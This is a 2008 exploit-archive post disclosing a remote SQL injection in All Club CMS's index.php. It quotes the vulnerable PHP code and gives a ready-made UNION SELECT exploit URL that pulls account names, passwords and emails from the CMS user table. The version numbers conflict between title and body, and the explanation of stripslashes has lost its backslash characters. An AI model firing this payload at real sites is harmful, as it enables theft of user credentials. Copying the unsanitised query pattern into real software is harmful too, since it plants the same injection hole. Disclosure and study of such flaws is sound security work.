[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : All Club CMS <= 0.0.2 index.php Remote SQL Injection Vulnerability
# Published : 2008-02-05
# Author : ka0x
# Previous Title : RMSOFT Gallery System 2.0 (images.php id) SQL Injection Vulnerability
# Next Title : Photokorn Gallery 1.543 (pic) SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bug found by ka0x
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
http://www.domlabs.org/
Script affected: All Club CMS
Vulnerability: Remote SQL Injection
Download: http://sourceforge.net/project/showfiles.php?group_id=209058
need magic_quotes_gpc = off
vuln code:
[...]
if (isset($_GET['name']) && (!(empty($_GET['name'])))) {
$name = $_GET['name'];
$name = stripslashes($name);
// stop hackers
if (eregi("http://", $name)) {
echo "<br /> No go on the hack attempt.<br />";
// log attempt, from IP, etc.
if ($SYS_SET['ban_attack_ip']) {
// ban ip if ban_attack_ip
}
die();
}
$sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");
[...]
Stripslashes function only deletes backslashes () and the backslashes
doubles (\) becomes simple ().
Exploit:
http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*
__EOF__
# www.Syue.com [2008-02-05]